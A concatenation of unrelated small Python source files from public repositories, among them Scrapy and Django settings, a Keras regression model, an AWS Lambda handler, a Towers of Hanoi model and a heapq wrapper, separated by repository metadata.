        for t in range(1, max_len):
            prediction, hidden, cell = self.decoder(step_input, hidden, cell)
            outputs[t] = prediction
            # Teacher forcing: ground truth vs the model's own best guess.
            use_teacher = random.random() < teacher_forcing_ratio
            step_input = trg[t] if use_teacher else prediction.argmax(1)
        return outputs
|
[
"ict.lotfi@gmail.com"
] |
ict.lotfi@gmail.com
|
469f0de51f71a670c2c97c116840ceeee506d79d
|
896f619c7a0ec175dc982c6741f3f5339972170f
|
/SuningPhones/SNPhones/settings.py
|
63c7930b1467b33a3fe662ee2e3c76f4ad7e2227
|
[] |
no_license
|
guowee/Spiders
|
f80c360e1a31a5fad99875b4114f913b26fa4c95
|
6a0eca5aae8bb967e3ae2f91184884411328960c
|
refs/heads/master
| 2021-05-31T03:03:47.003915
| 2016-02-24T08:09:49
| 2016-02-24T08:09:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,004
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for SNPhones project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# Core project identity: bot name and where Scrapy discovers/creates spiders.
BOT_NAME = 'SNPhones'

SPIDER_MODULES = ['SNPhones.spiders']
NEWSPIDER_MODULE = 'SNPhones.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'SNPhones (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'SNPhones.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'SNPhones.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
# Every scraped item is processed by SnphonesPipeline
# (priority 300; lower numbers run first).
ITEM_PIPELINES = {
    'SNPhones.pipelines.SnphonesPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"guowei@hipad.com"
] |
guowei@hipad.com
|
b0af8012a757037991610dc7af5768f0004a892a
|
d40aa60243a9c378adf7fee3e4a48639ac8d293c
|
/Session2/homework2/turtle2.py
|
00df8f2bb6ee2130b3cab15669efea67221049b4
|
[] |
no_license
|
peekachoo/dangthuhuyen-fundamental-c4e25
|
0bc0a83b515518d1a50bf2bbf67d628c1eeae990
|
372b17e65fc19d1c80da85e8ca94c0579904c0ae
|
refs/heads/master
| 2020-04-13T09:10:06.250844
| 2019-01-04T17:01:20
| 2019-01-04T17:01:20
| 163,103,818
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
from turtle import *

# Draw in red: four 100-px segments with 90-degree left turns (a square).
pencolor('red')
for i in range(4):
    left(90)
    forward(100)
# Five 100-px segments with 60-degree left turns.
for i in range(5):
    left(60)
    forward(100)
    # Switch to blue mid-drawing, then two angled segments.
    pencolor('blue')
    left(120)
    forward(100)
    right(120)
    forward(100)
    left(132)
    # Four 100-px segments with 72-degree left turns.
    for i in range(4):
        forward(100)
        left(72)
# Keep the window open until the user closes it.
mainloop()
|
[
"dhuyen135@gmail.com"
] |
dhuyen135@gmail.com
|
deda890d588f085cc6b869fe7ddee7392ab6638d
|
6dd524bf9d7879db62f86a62cceff3c5525fb2df
|
/setup.py
|
3690959e6d5cf0d67db6cfa9e455099ee10f14b4
|
[] |
no_license
|
ecbaldwin/git-replay
|
77a50ebc435f1d77f5f2f40bab8fb60aafc35236
|
dbc6da675542c77ff6fd95d073bb637677987bb1
|
refs/heads/master
| 2020-04-03T23:52:50.085883
| 2018-11-01T02:27:10
| 2018-11-01T02:27:10
| 155,632,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
#!/usr/bin/env python
# https://setuptools.readthedocs.io/en/latest/setuptools.html
# Packaging metadata for the git-replay prototype: installs console-script
# entry points for the CLI tools (git-graph, git-replay) and git hooks
# (post-rewrite, post-receive, update).
from setuptools import find_packages
from setuptools import setup

setup(name="git-replay",
      version="0.1",
      description="Prototype utility to track a change in git",
      author="Carl Baldwin",
      author_email="carl@ecbaldwin.net",
      url="https://github.com/ecbaldwin/git-replay",
      packages=find_packages(),
      entry_points={
          'console_scripts': [
              'git-graph = git_replay.graph_repo:main',
              'git-replay = git_replay.main:main',
              'post-rewrite = git_replay.post_rewrite:main',
              'post-receive = git_replay.post_receive:main',
              'update = git_replay.update:main',
          ]
      })
|
[
"carl@ecbaldwin.net"
] |
carl@ecbaldwin.net
|
2e730b1cf94aef703f29d97960597a7988937916
|
110287a9411047697fdb1371a7034f8781363562
|
/f2c_file_read_write.py
|
a392fc974d2deb44fd6599367d9e620dfe4290c3
|
[] |
no_license
|
chipperrip/IN1900
|
d791c04f94607cedfe5a4ae5fb34b83475cb73cf
|
76603e6a6cbf1022913e435a217a45032c02b6fc
|
refs/heads/master
| 2020-03-29T09:30:57.714458
| 2020-02-03T17:23:30
| 2020-02-03T17:23:30
| 149,761,841
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
# Read Fahrenheit values from 'Fdeg.dat' (3 header lines skipped, value in
# the last whitespace-separated column), convert to Celsius, and write both
# columns to 'F2C.txt'.
# FIX: files were opened without being closed on error; use context managers.
Fdegrees = []
Cdegrees = []
with open('Fdeg.dat', 'r') as infile:
    for i in range(3):  # skip the 3-line header
        infile.readline()
    for line in infile:
        F = float(line.split()[-1])
        C = (F - 32) * 5.0 / 9  # Fahrenheit -> Celsius
        Fdegrees.append(F)
        Cdegrees.append(C)
print(Fdegrees)
print(Cdegrees)
with open('F2C.txt', 'w') as outfile:
    for F, C in zip(Fdegrees, Cdegrees):
        # Columns are written Celsius first, matching the original output.
        outfile.write('%4.2f %4.2f \n' % (C, F))
|
[
"36035495+chipperrip@users.noreply.github.com"
] |
36035495+chipperrip@users.noreply.github.com
|
e49a598e24fcb2f3fe8cef6e157406fdbc6f48e5
|
b87cb4f34de3e02232b2a55d655f9942a7b545c7
|
/get_alerts_config.py
|
a83f4c76a76e52df9afb6603e3fe1c856fb90615
|
[] |
no_license
|
flowness/python
|
9aa787f4e17b2d32288209a8e883242a91e310ad
|
3c1c6a08daecdfcf828c4b6df9569ec51ac289ec
|
refs/heads/master
| 2020-03-18T06:20:45.459224
| 2018-06-11T16:35:26
| 2018-06-11T16:35:26
| 134,390,320
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
from __future__ import print_function
import json
import boto3
import get_alerts_utils
dynamo = boto3.client('dynamodb')
def respond(err, res=None):
    """Build an API-Gateway-style JSON response dict.

    :param err: exception instance or None. When set, the response is HTTP
        400 with the error text as the body; otherwise 200 with `res`
        JSON-encoded.
    :param res: JSON-serialisable payload for the success case.
    :return: dict with 'statusCode', 'body' and 'headers' keys.
    """
    print("res" + str(res))
    print("json res" + json.dumps(res))
    return {
        'statusCode': '400' if err else '200',
        # BUG FIX: Python 3 exceptions have no `.message` attribute; use
        # str(err) (also works on Python 2).
        'body': str(err) if err else json.dumps(res),
        'headers': {
            'Content-Type': 'application/json',
        },
    }
def lambda_handler(event, context):
    """AWS Lambda entry point: fetch alert config and wrap it in a response."""
    print("Received event: " + json.dumps(event, indent=2))
    alerts = getAlertsConfig(event)
    return respond(None, alerts)

def getAlertsConfig(event):
    """Fetch the AlertConfig DynamoDB item keyed by the event's moduleSN.

    Uses get_alerts_utils helpers to extract moduleSN from the event and to
    build the DynamoDB key.
    """
    moduleSN = get_alerts_utils.getValueFromEvent(event, 'moduleSN', '')
    response = dynamo.get_item(TableName='AlertConfig', Key=get_alerts_utils.getKeyForGetItem(moduleSN))
    print("Response alerts config: " + str(response))
    # NOTE(review): response['Item'] raises KeyError when no item matches
    # the key -- confirm that bubbling this up is the desired behaviour.
    return response['Item']
|
[
"noreply@github.com"
] |
noreply@github.com
|
e188fe3e8363af471d648137e1b454dd8bea97e5
|
bc9ecde6f62bf8b8f1217737c0b14d87c5e52ce2
|
/ANN.py
|
f906cf0326f626712e9759bf56153486158d2673
|
[] |
no_license
|
Akshusharma7/Air_Quality_prediction
|
b2806c366b0e69a111f51858e00eac4e13f04fd1
|
e90160446a4c2e1412679f46706d68ae814d7ae5
|
refs/heads/master
| 2020-09-23T14:29:35.506005
| 2020-02-23T12:42:35
| 2020-02-23T12:42:35
| 225,521,098
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,277
|
py
|
# Build, train and evaluate a dense regression network with Keras.
# NOTE(review): this script fragment assumes X, X_train, y_train, X_test,
# y_test and sns (seaborn) are defined/imported by earlier, unseen code.
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LeakyReLU, PReLU, ELU
from keras.layers import Dropout

NN_model = Sequential()
# The input layer.
# FIX: 'kernal_initializer' -> 'kernel_initializer'; 'X_shape' -> 'X.shape'.
NN_model.add(Dense(128, kernel_initializer='normal', input_dim=X.shape[1]))
# The hidden layers. FIX: 'Kernal_initializer' keyword spelling/casing.
NN_model.add(Dense(256, kernel_initializer='normal', activation='relu'))
NN_model.add(Dense(256, kernel_initializer='normal', activation='relu'))
NN_model.add(Dense(256, kernel_initializer='normal', activation='relu'))
# The output layer (single linear unit for regression).
NN_model.add(Dense(1, kernel_initializer='normal', activation='linear'))
# Compile the network.
NN_model.compile(loss='mean_absolute_error', optimizer='adam', metrics=['mean_absolute_error'])
NN_model.summary()
# Fit on the training set. FIX: deprecated 'nb_epoch' -> 'epochs'.
model_history = NN_model.fit(X_train, y_train, validation_split=0.33, batch_size=10, epochs=100)
# Model evaluation.
# FIX: 'NN_predict' was undefined -> NN_model.predict; use a single
# consistently-spelled 'predictions' variable throughout.
predictions = NN_model.predict(X_test)
print(y_test)
# Distribution of residuals.
sns.distplot(y_test.values.reshape(-1, 1) - predictions)
from sklearn import metrics
print("MAE: ", metrics.mean_absolute_error(y_test, predictions))
print("MSE: ", metrics.mean_squared_error(y_test, predictions))
# FIX: 'metrcs.mean_square_error' -> metrics.mean_squared_error.
print("RMSE: ", np.sqrt(metrics.mean_squared_error(y_test, predictions)))
|
[
"noreply@github.com"
] |
noreply@github.com
|
0df2bc1b85cc7cc16ad4f5c3476a7bcbe79fa94c
|
d50a7ffef5fde766e6d97b9b1f8cc49ad2b54630
|
/latplan/puzzles/model/hanoi.py
|
0630f6eeb9128a8caaac80ab6272c3defe37f66d
|
[] |
no_license
|
pucrs-automated-planning/latplan
|
3c31527bacd49cbe4501a9a13be8d02e3547747b
|
fadeaee0a49da92263dd72fb171b7f114b1cffd1
|
refs/heads/master
| 2021-07-15T19:16:44.571705
| 2019-01-24T17:38:00
| 2019-01-24T17:38:00
| 111,113,712
| 3
| 2
| null | 2018-09-10T17:20:09
| 2017-11-17T14:39:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,771
|
py
|
#!/usr/bin/env python3
import numpy as np
# config encoding:
# A config is a sequence of x-positions (towers)
# [0,2,1,2,1,0]
# since there is an implicit order that is enforced,
# the assignments of each disk to some tower defines a unique, valid state
# [0,2,1,2,1,0] == [[05][24][13]]
# random config is available from np.random.randint(0,3,size)
def generate_configs(disks=6, towers=3):
    """Yield every assignment of `disks` disks to `towers` towers.

    Each config is a tuple of tower indices, one per disk; the implicit
    size ordering of disks on a tower makes every assignment a unique,
    valid state.
    """
    from itertools import product
    return product(range(towers), repeat=disks)
# state encoding:
# intermediate representation for generating an image.
# XX each disk has an x-position and a y-position (counted from the bottom)
# each tower has a sequence of numbers (disks)
# in the decreasing order
# for example,
# [[012345678][][]] is the initial state of the tower
# [[][][012345678]] is the goal state of the tower
def config_state(config, disks, towers):
    """Expand a config (tower index per disk) into per-tower disk lists.

    Disks appear in increasing index (top-to-bottom) order within each
    tower, e.g. (0,2,1,2,1,0) -> [[0,5],[2,4],[1,3]].
    """
    towers_content = [[] for _ in range(towers)]
    for disk, tower in enumerate(config):
        towers_content[tower].append(disk)
    return towers_content
def state_config(state, disks, towers):
    """Inverse of config_state: per-tower disk lists -> int8 array of
    tower indices, one entry per disk."""
    config = np.zeros(disks, dtype=np.int8)
    for tower_idx, tower in enumerate(state):
        for disk in tower:
            config[disk] = tower_idx
    return config
def successors(config, disks, towers):
    """Enumerate the configs reachable from `config` by one legal move.

    A disk may move from tower i to tower j when i is non-empty and j is
    either empty or topped by a larger disk.
    """
    from copy import deepcopy
    state = config_state(config, disks, towers)
    result = []
    for src in range(towers):
        if not state[src]:
            continue  # nothing to move from an empty tower
        for dst in range(towers):
            if dst == src:
                continue
            if state[dst] and state[dst][0] <= state[src][0]:
                continue  # would place a larger disk on a smaller one
            moved = deepcopy(state)
            moved[dst].insert(0, moved[src].pop(0))
            result.append(state_config(moved, disks, towers))
    return result
|
[
"leonardo@lsa.pucrs.br"
] |
leonardo@lsa.pucrs.br
|
de883cc1f5cdb1aea8cfe37ce4a51db19552238b
|
0937aff71737318be1535917deed0b87987c40f7
|
/training_model.py
|
db69e61b187f571bf71b7b6e659790a3dd2e89f2
|
[] |
no_license
|
smemadi/aws_test
|
6d6d90fa7f7c06bfafe68495b7d44a7e18e1db08
|
248818b0ad89217d29a3ecbb66d40c2e07bab15f
|
refs/heads/master
| 2023-08-02T16:43:58.945227
| 2021-09-11T14:12:39
| 2021-09-11T14:12:39
| 405,395,652
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,108
|
py
|
import pandas as pd
import numpy as np

# Load the Titanic train/test splits from the working directory.
df = pd.read_csv("train.csv")
df_test = pd.read_csv("test.csv")
def get_title(name):
    """Extract the honorific from a name like 'Last, Title. First ...'.

    Returns 'No title' when the name contains no '.' at all.
    """
    if "." not in name:
        return "No title"
    return name.split(",")[1].split(".")[0].strip()
# Distinct honorifics appearing in the training names (diagnostic set).
titles = set([x for x in df.Name.map(lambda x: get_title(x))])
def shorter_titles(x):
    """Collapse rare honorifics into coarse buckets (row-wise apply helper).

    :param x: mapping/row exposing a 'Title' key.
    :return: the bucketed title string.
    """
    title = x["Title"]
    if title in ("Capt", "Col", "Major"):
        return "Officer"
    if title in ("Jonkheer", "Don", "the Countess", "Dona", "Lady", "Sir"):
        return "Royalty"
    if title == "Mme":
        return "Mrs"
    if title in ("Mlle", "Ms"):
        return "Miss"
    return title
# Feature engineering on the training frame.
df["Title"] = df["Name"].map(lambda x: get_title(x))
df["Title"] = df.apply(shorter_titles, axis=1)
# Impute missing ages with the median.
# NOTE(review): the second fillna is redundant after the .loc assignment.
df.loc[df["Age"].isnull(), "Age"] = df["Age"].median()
df["Age"].fillna(df["Age"].median(), inplace=True)
df["Embarked"].fillna("S", inplace=True)
# Drop columns not used as features.
del df["Cabin"]
df.drop("Name", axis=1, inplace=True)
# Encode categoricals as small integers.
df.Sex.replace(("male", "female"), (0, 1), inplace=True)
df.Embarked.replace(("S", "C", "Q"), (0, 1, 2), inplace=True)
df.Title.replace(('Mr', 'Miss', 'Mrs', 'Master', 'Dr', 'Rev', 'Officer', 'Royalty'), (0, 1, 2, 3, 4, 5, 6, 7), inplace=True)
df.drop("Ticket", axis=1, inplace=True)
##############
# Train/validation split, random-forest fit, and model persistence.
from sklearn.model_selection import train_test_split
x = df.drop(["Survived", "PassengerId"], axis=1)
y = df["Survived"]
x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.2, random_state=1979)
import pickle  # used to persist the fitted model parameters
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
####
randomforest = RandomForestClassifier()
randomforest.fit(x_train, y_train)
y_pred = randomforest.predict(x_val)
accuracy_randomforest = round(accuracy_score(y_pred, y_val) * 100, 2)
# print("random forest acccuracy is :", accuracy_randomforest)
pickle.dump(randomforest, open('titanic_model.sav', 'wb'))
def prediction_model(pclass, sex, age, sibsp, parch, fare, embarked, title):
    """Load the pickled model and predict survival for one passenger.

    All arguments are the already-encoded numeric features used in training
    (same order as the training columns).

    :return: the model's prediction array for the single row.
    """
    import pickle
    features = [[pclass, sex, age, sibsp, parch, fare, embarked, title]]
    # BUG FIX: the model file must be opened for reading ('rb'), not
    # writing ('wb'); also use a context manager so the handle is closed.
    with open('titanic_model.sav', 'rb') as fh:
        model = pickle.load(fh)
    # BUG FIX: 'predicitons' was a misspelled, undefined name (NameError).
    predictions = model.predict(features)
    print(predictions)
    return predictions
|
[
"sid.emadi@gmail.com"
] |
sid.emadi@gmail.com
|
0d316c17ae6205c8d67b07880fd12e2b2f84359c
|
76ce1e3f85aff9fcd5e7a902b535af352922a9c5
|
/main.py
|
404c9fcd147cb256e475dc78941c04b772de1e16
|
[
"MIT"
] |
permissive
|
f-grimaldi/CivTableGame
|
3d8900417382bb0c890a1c1b994428d1083086bc
|
e4f73098f74db6f45f6e57faf0260c20c0c13a1e
|
refs/heads/main
| 2022-12-31T20:30:28.567302
| 2020-10-20T14:06:30
| 2020-10-20T14:06:30
| 305,722,757
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,077
|
py
|
import src.Table as Table
import src.Player as pl
import numpy as np
import pygame
import time
def plain_load_icons(player_number, resolution):
    """Load and scale every terrain/player sprite to a single cell size.

    Requires the pygame image subsystem and an imgs/ directory next to the
    script. Returns a dict mapping icon names (as used by display_map) to
    scaled pygame surfaces.
    """
    size = get_cell_size(player_number, resolution)
    # Terrain sprites.
    water_icon = pygame.transform.scale(pygame.image.load('imgs/water.png'), size)
    mountain_icon = pygame.transform.scale(pygame.image.load('imgs/mountain.png'), size)
    desert_icon = pygame.transform.scale(pygame.image.load('imgs/desert.jpg'), size)
    forest_icon = pygame.transform.scale(pygame.image.load('imgs/tree.png'), size)
    # NOTE(review): plain reuses the forest sprite ('imgs/tree.png') --
    # likely a placeholder; confirm a dedicated plain image exists.
    plain_icon = pygame.transform.scale(pygame.image.load('imgs/tree.png'), size)
    undiscover_icon = pygame.transform.scale(pygame.image.load('imgs/undiscovered.png'), size)
    # Capitol/city sprites for up to four players.
    player1_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol1.jpg'), size)
    player1_city = pygame.transform.scale(pygame.image.load('imgs/base_city1.jpg'), size)
    player2_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol2.jpg'), size)
    player2_city = pygame.transform.scale(pygame.image.load('imgs/base_city2.jpg'), size)
    player3_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol3.jpg'), size)
    player3_city = pygame.transform.scale(pygame.image.load('imgs/base_city3.jpg'), size)
    player4_cap = pygame.transform.scale(pygame.image.load('imgs/base_capitol4.jpg'), size)
    player4_city = pygame.transform.scale(pygame.image.load('imgs/base_city4.jpg'), size)
    return {'undiscover_icon': undiscover_icon,
            'water_icon': water_icon,
            'desert_icon': desert_icon,
            'mountain_icon': mountain_icon,
            'forest_icon': forest_icon,
            'plain_icon': plain_icon,
            'player1_cap': player1_cap,
            'player1_city': player1_city,
            'player2_cap': player2_cap,
            'player2_city': player2_city,
            'player3_cap': player3_cap,
            'player3_city': player3_city,
            'player4_cap': player4_cap,
            'player4_city': player4_city,}
def get_cell_size(player_number, resolution):
    """Pixel size (w, h) of one map cell.

    The board is 4 * player_number cells along each axis, so each cell is
    the screen resolution integer-divided by that count.
    """
    cells_per_side = 4 * player_number
    return resolution[0] // cells_per_side, resolution[1] // cells_per_side
def display_map(screen, map, icon_dict, player_number, resolution):
    """Blit the whole board onto `screen`.

    `map` is a Table.Map whose .map attribute is a 2-D array of pieces,
    each exposing .discovered and a 4x4 .mapPiece cell grid. Cell codes are
    mapped to sprite names via value_to_icon below.
    """
    value_to_icon = {-1: 'undiscover_icon', 0: 'water_icon', 3: 'desert_icon',
                     1: 'mountain_icon', 2: 'forest_icon', 4: 'plain_icon',
                     100: 'player1_cap', 101: 'player1_city', 102: 'p1_settler_icon', 103: 'p1_explorer_icon',
                     200: 'player2_cap', 201: 'player2_city', 202: 'p2_settler_icon', 203: 'p2_explorer_icon',
                     300: 'player3_cap', 301: 'player3_city', 302: 'p3_settler_icon', 303: 'p3_explorer_icon',
                     400: 'player4_cap', 401: 'player4_city', 402: 'p4_settler_icon', 403: 'p4_explorer_icon',
                     }
    values = []
    size = get_cell_size(player_number, resolution)
    # Flatten the board row-major at *cell* granularity: for each piece row,
    # emit its four cell rows in order so `values` lists the cells screen
    # row by screen row.
    for row in range(map.map.shape[0]):
        for i in range(4):
            for col in range(map.map.shape[1]):
                for j in range(4):
                    if map.map[row, col].discovered:
                        values.append(map.map[row, col].mapPiece[i, j])
                    else:
                        # NOTE(review): appends the int -1 while the draw
                        # loop below reads v.cell -- this would raise
                        # AttributeError for undiscovered pieces; confirm.
                        values.append(-1)
    # Draw each cell at its screen position.
    for n, v in enumerate(values):
        r, c = n // (4 * map.map.shape[0]), n % (4 * map.map.shape[0])
        where = (c * size[1], r * size[0])
        screen.blit(icon_dict[value_to_icon[v.cell]], where)
        # TODO: draw units present on the cell.
        # if len(v.units) != 0:
        #     screen.blit(###TODO)
        # TODO: draw resources present on the cell.
        # if len(v.resources) != 0:
        #     screen.blit(##TODO)
if __name__ == '__main__':
    ### Configuration
    DISPLAY_SIZE = (900, 900)
    N_PLAYERS = 4
    # Starting board corners, faction names and map-piece rotations, one
    # entry per player.
    position = [(0, 0), (0, 3), (3, 3), (3, 0)]
    player_type = ['romans', 'arabs', 'chinese', 'greeks']
    rotations = [180, 90, 0, 0]
    ### Display setup
    pygame.init()
    screen = pygame.display.set_mode(DISPLAY_SIZE)
    ### Window title and icon
    pygame.display.set_caption('Civilization Table Game')
    icon = pygame.image.load('imgs/logo.jpg')
    pygame.display.set_icon(icon)
    ### Sprite cache scaled to the current cell size
    plain_icon_dict = plain_load_icons(player_number=N_PLAYERS, resolution=DISPLAY_SIZE)
    ### Board: player home pieces in the corners, random pieces elsewhere
    map = Table.Map(number_of_players=len(player_type))
    for n, player_id in enumerate(player_type):
        map.set_player(player_id=player_id, rotation=rotations[n], row=position[n][0], column=position[n][1])
    for i in range(len(player_type)):
        for j in range(len(player_type)):
            if (i, j) not in position:
                map.set_random_mapPiece(row=i, column=j)
    ### Players
    players = [pl.Player(player_type[i], starting_cordinates=position[i], rotation=rotations[i]) for i in range(N_PLAYERS)]
    ### Example: reveal a few pieces
    map.map[1, 0].discovered = True
    map.map[1, 3].discovered = True
    map.map[2, 0].discovered = True
    map.map[3, 2].discovered = True
    ### Initial render
    display_map(screen, map, plain_icon_dict, N_PLAYERS, DISPLAY_SIZE)
    pygame.display.update()
    ### Background fill
    # NOTE(review): filling after display_map overwrites the rendered map on
    # this update -- confirm the intended draw order.
    screen.fill((200, 200, 200))
    pygame.display.update()
    ### Game loop
    running = True
    while running:
        time.sleep(1)
        # Quit when the window is closed.
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
        time.sleep(1)
        ### Place capitols
        for user in players:
            user.found_city(map, user.starting_cordinates, where=(2, 2), is_capitol=True)
        pygame.display.update()
        ### Create starting units
        # NOTE(review): 'explored' may be a typo for 'explorer' -- confirm
        # against Player.create_units.
        for user in players:
            user.create_units('settler', map, tesseract=[0, 0], where=(1, 1))
            user.create_units('explored', map, tesseract=[0, 0], where=(1, 1))
|
[
"f.grimaldi.94@gmail.com"
] |
f.grimaldi.94@gmail.com
|
7912f7822fc55994073ac442f700ada40f6fe975
|
0cdd98e4ca426b38797781b37cee4cf059cd0500
|
/heapqo.py
|
2c700b2871ebc515540a4977e4746a18d676e575
|
[] |
no_license
|
SeanTKeegan/DeepCompression
|
0c205ec45d6f7f3daf6730360e8e47c48a93aa33
|
d0f9aa6c7d5173f21ae4dd93d0b772aaa6eb2c27
|
refs/heads/master
| 2020-04-09T09:02:55.374889
| 2019-05-22T08:29:25
| 2019-05-22T08:29:25
| 160,218,908
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,485
|
py
|
from __future__ import print_function, absolute_import
import functools
import heapq
__all__ = ["Heap"]
def _with_docstring(source):
@functools.wraps(source)
def _with_docstring_wrap(target):
target.__doc__ = source.__doc__
return target
return _with_docstring_wrap
class Heap(object):
    """Object-oriented wrapper around the heapq module functions.

    The wrapped list is heapified in place on construction. Push-style
    methods first check that the new item is orderable against the current
    items, raising ValueError (rather than a mid-operation TypeError) on
    mixed, incomparable types. Each public method carries the docstring of
    the corresponding heapq function via the _with_docstring decorator.
    """
    def __init__(self, heap):
        self.heap = heap
        heapq.heapify(self.heap)
    def __len__(self):
        return len(self.heap)
    def _validate_push(self, item):
        # Orderability probe: compare against the root in both directions;
        # the result is unused, only a TypeError matters.
        try:
            if self.heap:
                item < self.heap[0] < item
        except TypeError:
            raise ValueError(
                "can't order new item type ({}) with existing type ({})".format(
                    type(item).__name__, type(self.heap[0]).__name__
                )
            )
    @_with_docstring(heapq.heappush)
    def push(self, item):
        self._validate_push(item)
        heapq.heappush(self.heap, item)
    @_with_docstring(heapq.heappop)
    def pop(self):
        return heapq.heappop(self.heap)
    @_with_docstring(heapq.heappushpop)
    def pushpop(self, item):
        self._validate_push(item)
        return heapq.heappushpop(self.heap, item)
    @_with_docstring(heapq.heapreplace)
    def replace(self, item):
        self._validate_push(item)
        return heapq.heapreplace(self.heap, item)
|
[
"noreply@github.com"
] |
noreply@github.com
|
60c88d77b0d2bfbd373891e2dbb359a5c6e1d25c
|
95c1d95350a9c2741b99ff8ac2e0bdfcbe638c6d
|
/leads/migrations/0008_contactus.py
|
fc677ccd8c95a5796d0104803901dfe083bb884a
|
[] |
no_license
|
jeevanc161/leadapp
|
67e0aa4e371878296a96447556294d04e1c5c4c0
|
8f801bdc02cc9a5ac136936b098ab747ae026173
|
refs/heads/master
| 2023-06-16T07:36:34.113816
| 2021-07-12T06:06:24
| 2021-07-12T06:06:24
| 380,223,057
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 689
|
py
|
# Generated by Django 3.1.2 on 2021-07-11 13:03
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds the Contactus model backing the
    # site's contact form (name/email/subject/message).

    dependencies = [
        ('leads', '0007_auto_20210615_1002'),
    ]

    operations = [
        migrations.CreateModel(
            name='Contactus',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
                ('email', models.EmailField(max_length=254)),
                ('subject', models.CharField(max_length=250)),
                ('message', models.TextField()),
            ],
        ),
    ]
|
[
"jeevanc162@gmail.com"
] |
jeevanc162@gmail.com
|
45ff2731d524714c05b51daf9bc57ef935b6cb18
|
d26a82e8e72bb945a45082f69c19e571c9b49240
|
/yohanneswebsite/settings.py
|
bb397b409ed51085af6859339cdac6a489bdfac9
|
[] |
no_license
|
Yohannes27/mathias
|
cc5fab8a0830f7a81a653a3eee618123afd24487
|
6beea7ddb293f1f9dc7d8f5d17dbe2407584f7fa
|
refs/heads/master
| 2023-05-31T20:11:57.551715
| 2021-07-15T20:52:32
| 2021-07-15T20:52:32
| 386,419,673
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,616
|
py
|
"""
Django settings for yohanneswebsite project.
Generated by 'django-admin startproject' using Django 3.0.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'o%2!l+&wc3n+23dsxpo+@)rx-#e-jt*+s$=1$8yepv5ddm5c(j'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
